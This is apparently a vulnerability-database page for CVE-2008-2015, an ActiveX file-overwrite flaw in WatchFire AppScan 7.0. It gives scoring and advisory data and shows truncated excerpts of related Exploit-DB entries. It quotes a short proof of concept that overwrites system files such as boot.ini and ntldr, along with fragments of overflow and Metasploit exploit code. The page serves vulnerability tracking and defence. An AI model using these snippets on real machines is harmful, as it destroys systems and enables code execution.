CVE-2008-2015
Published 2008-04-30
CVE-2008-2015: Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary…
Priority: P3 (46) · critical 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 8.33% (94.2th percentile)
Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the (1) CompactSave and (2) SaveSession method in one control, and the (3) saveRecordedExploreToFile method in a different control. NOTE: this can be leveraged for code execution by writing to a Startup folder.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| watchfire | appscan | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 9.3 | CRITICAL | — |
GHSA
GHSA-89pq-qvjv-f582: Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7
ghsa_unreviewed · 2022-05-01 · CVE-2008-2015 [HIGH] · CWE-22
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security · 2018-08-23 · CVSS 7.2 · CVE-2000-1134 [HIGH]
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
jasper: integer overflow in the jas_matrix_create() function
vendor_redhat · 2015-12-24 · CVSS 9.3 · CVE-2015-8751 [CRITICAL] · CWE-190
Integer overflow in the jas_matrix_create function in JasPer allows context-dependent attackers to have unspecified impact via a crafted JPEG 2000 image, related to integer multiplication for memory allocation.
Statement: This issue did not affect the versions of jasper as shipped with Red Hat Enterprise Linux 6 and 7 as it was already fixed via CVE-2008-3520.
Package: netpbm (Red Hat Enterprise Linux 5) - Not affected
Package: jasper (Red Hat Enterprise Linux 6) - Not affected
Package: jasper (Red Hat Enterprise Linux 7) - Not affected
Package: mingw-virt-viewer (Red Hat Enterprise Virtualization 3) - Not affected
No detection rules found.
Exploit-DB
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
exploitdb · 2019-10-29 · CVSS 3.3 · CVE-2015-0009 [LOW]
---
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7, Windows Server 2012
# CVE : CVE-2015-0009
# Type: Remote
# Platform: Windows
# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes
# the target system to revert various security settings to their default settings. This includes SMB server
# and network client settings, which by default do not
Exploit-DB
Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)
exploitdb · 2019-10-29 · CVSS 8.3 · CVE-2015-0008 [HIGH]
---
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7, Windows Server 2012
# CVE : CVE-2015-0008
# Type: Remote
# Platform: Windows
# Description: While there exists multiple advisories for the vulnerability and video demos of
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code
# targets vulnerable systems in order to modify registry keys to disabl
Exploit-DB
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
exploitdb · 2015-09-06
---
# Exploit Title: [ActiveState] Perl.exe x64 Client Denial of Service (v5.20.2)
# Date: 9-3-2015
# Software Link: http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.20.2.2002/ActivePerl-5.20.2.2002-MSWin32-x64-299195.msi
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target(s): Windows 7, Server 2008, server 2012, Windows 8.1, Windows 10
# CVE:
# Category: Denial of Service Exploits
#
# Description:
# A Denial of Service can be achieved by concatenating several large strings together and attempting to write to file.
my $buff = "\x41" x 7000;
my $endofbuff = "\x42" x 5860;
open(myfile,'>orgsched.ocf'); # file extension is irrelevant
pri
Exploit-DB
Microsoft Word - Local Machine Zone Code Execution (MS15-022)
exploitdb · 2015-07-20 · CVSS 9.3 · CVE-2015-0097 [CRITICAL]
---
Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability
Date: July 15th, 2015
Exploit Author: Eduardo Braun Prado
Vendor Homepage : http://www.microsoft.com
Version: 2007
Tested on: Microsoft Windows XP, 2003, Vista, 2008, 7, 8, 8.1
CVE: CVE-2015-0097
Original Advisory: https://technet.microsoft.com/library/security/ms15-022
Microsoft Word, Excel and PowerPoint 2007 contain a remote code execution vulnerability because it is possible to reference documents such as Works documents (.wps) as HTML. It will process HTML and script code in the context of the Local Machine Zone of Internet Explorer, which leads to arbitrary code execution.
By persuading users into opening e.g. specially crafted .WPS,
Exploit-DB
Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)
exploitdb · 2015-06-24 · CVSS 7.8 · CVE-2015-1701 [HIGH]
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 'Windows ClientCopyImage Win32k Exploit',
'Description' => %q{
This module exploits improper object handling in the win32k.sys kernel mode driver.
This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
Windows 2008 R2 SP1 x64.
},
'License' => MSF_LICENSE,
'Author' => [
'Unknown', # vulnerability discovery and exploit in the wild
'hfirefox', # Code released on github
'OJ Reeves' # msf module
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => 'win',
'
Exploit-DB
BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)
exploitdb · 2015-05-18 · CVSS 9.3 · CVE-2008-5753 [CRITICAL]
---
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#
#!/usr/bin/python
from struct import pack
# offset to SEH is 93 bytes
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L'
Exploit-DB
FastStone Image Viewer 5.3 - '.tga' Crash (PoC)
exploitdb · 2015-03-19
---
# Exploit Title : FastStoneImage Viewer (Corrupted tga) IMAGESPECIFICATION.Width Crash POC
# Product : FastStoneImage Viewer
# Date : 25.02.2015
# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://www.faststone.org/FSViewerDownload.htm
# Vulnerable version : 5.3 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.faststone.org/
# Tested on : FastStoneImage Viewer 5.3 installed on Windows 7 x64, Windows Server 2008
# CVE : unknown at the moment
#============================================================================================
# Open created POC file (poc.tga) with FastStoneImage Viewer
# Details
#*** ERROR: Module load completed but symbols c
Exploit-DB
Intel Network Adapter Diagnostic Driver - IOCTL Handling
exploitdb · 2015-03-14 · CVSS 7.8 · CVE-2015-2291 [HIGH]
---
/*
Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability
Vendor: Intel
Product webpage: http://www.intel.com
Affected product(s):
Network Adapter Driver for Windows XP
Network Adapter Driver for Windows 7
Network Adapter Driver for Windows 8
Network Adapter Driver for Windows 2008/R2
Network Adapter Driver for Windows 2012/R2
Affected version(s):
Intel(R) iQVW64.SYS v1.03.0.7
Intel(R) iQVW32.SYS v1.03.0.7
Tested Operating systems:
Windows XP SP3 (32-bit)
Windows 7 SP1 (32/64-bit)
Date: 14/03/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-2291
Disclosure Timeline:
10-06-2014: Vendor Notification
21-06-2014: Vendor Response/Feedback
08-08-2014: Vendor Response/Feedback
26-08-2014: Requesting Status/No Vendor Re
Exploit-DB
Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
exploitdb · 2015-02-27 · CVSS 10.0 · CVE-2015-1497 [CRITICAL]
---
# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previously HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10
require 'msf/core'
class Metasploit3 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
'Description' => %Q{
This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
},
'Author' => [ 'Ben Turner'
Exploit-DB
SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows
exploitdb · 2015-01-05 · CVE-2012-2271
---
ActiveX Buffer Overflow in SkinCrafter3_vs2005
Affected version: 3.8.1.0
Vendor Homepage: http://skincrafter.com/
Software Link: skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
The vulnerability lies in the COM component used by the product, SkinCrafter3_vs2005.dll.
Description: SkinCrafter is software used to create custom skins for different Windows applications.
SkinCrafter is compatible with Windows XP / Vista / 7 / 8 and earlier versions.
Vulnerability tested on Windows XP SP3 (EN), with IE6
Author: metacom
Vulnerability discovered: 04.01.2015
junk1 = "";
while(junk1.length
################################################################################
ActiveX Buffer Overflow in SkinCrafter
Exploit-DB
Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods
exploitdb · 2008-04-25 · CVE-2008-2015
---
Multiple Insecure Methods in AppScan Watchfire Web Application Security v7.0
Remote: Yes
An arbitrary file overwrite has been discovered in an ActiveX control installed with WatchFire AppScan v7.0.
by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r
function Do_it()
{
File = "c:\\autoexec_.bat"
ctrl.CompactSave(File)
}
function Do_it()
{
File = "c:\\boot_.ini"
ctrl.saveRecordedExploreToFile(File)
}
function Do_it()
{
File = "c:\\ntldr_"
ctrl.SaveSession(File)
}
# milw0rm.com [2008-04-25]
Nuclei
Microsoft Windows 'HTTP.sys' - Remote Code Execution
nuclei · CVSS 9.8 · CVE-2015-1635 [CRITICAL]
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Template:
id: CVE-2015-1635
info:
name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
author: Phillipo
severity: critical
description: |
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
impact: |
Attackers can execute arbitrary code remotely on Windows servers running vulnerab
No writeups or analysis indexed.
References:
- http://www.securityfocus.com/bid/28940
- http://www.securitytracker.com/id?1019948
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42077
- https://www.exploit-db.com/exploits/5496
Published: 2008-04-30